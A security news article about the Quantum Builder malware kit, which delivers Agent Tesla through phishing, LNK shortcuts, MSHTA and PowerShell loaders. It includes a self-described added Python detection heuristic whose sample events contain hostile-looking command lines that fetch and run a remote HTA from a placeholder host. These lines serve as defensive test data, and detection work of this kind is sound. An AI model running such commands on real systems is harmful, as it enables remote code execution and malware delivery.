Wednesday, September 28, 2022

Cyber Criminals Using Quantum Builder Sold on Dark Web to Deliver Agent Tesla Malware


A recently discovered malware builder called Quantum Builder is being used to deliver the Agent Tesla remote access trojan (RAT).

“This campaign features enhancements and a shift toward LNK (Windows shortcut) files when compared to similar attacks in the past,” Zscaler ThreatLabz researchers Niraj Shivtarkar and Avinash Kumar said in a Tuesday write-up.


Sold on the dark web for €189 a month, Quantum Builder is a customizable tool for generating malicious shortcut files as well as HTA, ISO, and PowerShell payloads to deliver next-stage malware on the targeted machines, in this case Agent Tesla.

The multi-stage attack chain starts with a spear-phishing email containing a GZIP archive attachment that includes a shortcut designed to execute PowerShell code responsible for launching a remote HTML application (HTA) using MSHTA.

The phishing emails purport to be an order confirmation message from a Chinese supplier of lump and rock sugar, with the LNK file masquerading as a PDF document.

The HTA file, in turn, decrypts and executes another PowerShell loader script, which acts as a downloader for fetching the Agent Tesla malware and executing it with administrative privileges.

In a second variant of the infection sequence, the GZIP archive is replaced by a ZIP file, while also adopting additional obfuscation techniques to camouflage the malicious activity.
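As an added illustration (not code from the Zscaler write-up or from this article), the following Python snippet runs a simple parent/child process heuristic over constructed Sysmon-style process-creation events to flag each stage of the chain described above: an LNK-launched PowerShell invoking MSHTA with a remote HTA URL, MSHTA fetching that HTA, and the HTA spawning a PowerShell loader. The field names, the sample events and the placeholder host are assumptions.

```python
import re

# Constructed process-creation events (Sysmon Event ID 1 style fields); these are
# illustrative samples, not telemetry from the campaign described in the article.
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
SAMPLE_EVENTS = [
    {"Image": r"C:\Windows\explorer.exe", "ParentImage": r"C:\Windows\System32\userinit.exe",
     "CommandLine": "explorer.exe"},
    # LNK double-clicked from explorer.exe runs PowerShell, which calls MSHTA with a remote HTA
    {"Image": PS, "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": 'powershell.exe -w hidden -c "mshta http://placeholder.invalid/order.hta"'},
    {"Image": r"C:\Windows\System32\mshta.exe", "ParentImage": PS,
     "CommandLine": "mshta http://placeholder.invalid/order.hta"},
    # The HTA decrypts and launches a PowerShell loader ("AAAA" is a constructed stand-in, not a payload)
    {"Image": PS, "ParentImage": r"C:\Windows\System32\mshta.exe",
     "CommandLine": "powershell.exe -nop -enc AAAA"},
    # Local HTA opened from the desktop: does not match the remote-fetch pattern
    {"Image": r"C:\Windows\System32\mshta.exe", "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": r"mshta C:\Users\alice\local_app.hta"},
]

# mshta invoked with an http(s) URL, optionally wrapped in quotes inside a PowerShell -c string
REMOTE_HTA = re.compile(r'mshta(?:\.exe)?\s+"?https?://', re.IGNORECASE)


def basename(path):
    return path.rsplit("\\", 1)[-1].lower()


def classify(event):
    """Return a label for the chain stage this event matches, or None."""
    img, parent, cmd = basename(event["Image"]), basename(event["ParentImage"]), event["CommandLine"]
    # Stage 1: PowerShell launched via a shortcut (parent explorer.exe) that calls MSHTA with a remote HTA
    if img == "powershell.exe" and parent == "explorer.exe" and REMOTE_HTA.search(cmd):
        return "lnk_powershell_remote_hta"
    # Stage 2: MSHTA fetching an HTA over HTTP(S) under a PowerShell parent
    if img == "mshta.exe" and parent == "powershell.exe" and REMOTE_HTA.search(cmd):
        return "mshta_remote_hta"
    # Stage 3: HTA spawning a PowerShell loader; noisier on its own, so correlate with stages 1 and 2
    if img == "powershell.exe" and parent == "mshta.exe":
        return "hta_spawned_powershell"
    return None


def detect(events):
    """Return [(index, label)] for every event matching a stage of the chain."""
    return [(i, lbl) for i, e in enumerate(events) if (lbl := classify(e))]


if __name__ == "__main__":
    for i, label in detect(SAMPLE_EVENTS):
        print(f"event {i}: {label} :: {SAMPLE_EVENTS[i]['CommandLine']}")
```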


Quantum Builder has witnessed a surge in usage in recent months, with threat actors using it to distribute a variety of malware, such as RedLine Stealer, IcedID, GuLoader, RemcosRAT, and AsyncRAT.

“Threat actors are continuously evolving their tactics and making use of malware builders sold on the cybercrime market,” the researchers said.

“This Agent Tesla campaign is the latest in a string of attacks in which Quantum Builder has been used to create malicious payloads in campaigns against various organizations.”
